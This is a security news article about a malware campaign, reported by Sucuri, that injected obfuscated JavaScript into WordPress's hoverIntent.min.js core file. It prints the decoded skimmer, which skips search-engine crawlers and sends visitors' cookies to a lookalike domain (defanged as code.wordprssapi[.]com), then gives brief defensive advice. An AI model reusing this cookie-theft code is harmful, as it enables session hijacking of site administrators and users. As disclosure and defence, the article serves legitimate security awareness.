Malware Steal Wordpress Cookies and sending it to fake WordPressAPI

Sucuri researchers warned that the “code.wordprssapi.com” website was recently used to steal Wordpress cookies and hijack sessions. Attackers can steal active cookies, pretend to be that user and perform any actions the user has permissions to make.

A cookie is a small piece of data sent from a website and stored on the user’s computer by the user’s web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added to the shopping cart in an online store) or to record the user’s browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past).

Attackers used a website name that is not suspicious and seems to be a legitimate WordPress site (wordprssapi.com). This is extremely dangerous when considering administrator users.

Hackers used a Wordpress core file ( wp-includes/js/hoverIntent.min.js.) to inject a malicious code that used typical eval(function(p, a,c,k,e,d) obfuscation at the bottom of the JavaScript file.

Sucuri researchers decoded the code and found the following:

function adsadsgg() {
  var gd = document.cookie.indexOf("_utmzz=");
  if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {
    	var rd = Math.floor(Math.random() * 2);
    	if (rd == 0) {
        	var sss = document.createElement('script');
        	sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);
        	document.body.appendChild(sss)
    	}
    	var dd = new Date();
    	dd.setTime(dd.getTime() + 86400000);
    	window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString()
  }
}
if (typeof(jQuery) != 'undefined') {
  jQuery(function() {
    	adsadsgg()
  })
} else {
  window.onload = function() {
    	adsadsgg()
  }
}

 

The hackers used a conditional statement at the top of the code that excludes cookies from user agents that are coming from search engine spiders and this guarantees that the information that sent to attackers is more likely to be usable immediately.
The injected code then gathers the current cookie data and sends it to the malicious website (code.wordprssapi.com) to be used by attackers.

Attackers are using tricks to evade detection by webmasters. Webmasters can prevent falling victims to such attacks by paying close attention to the code when reviewing it. Be careful and always check that a domain is legitimate.

Related posts

ANY.RUN Discovers Tricky Phishing Attack Using Fake CAPTCHA

Kia Dealer Portal Vulnerability Risked Millions of Cars

Latest Octo Malware Variant Mimics Popular Apps Like NordVPN, Chrome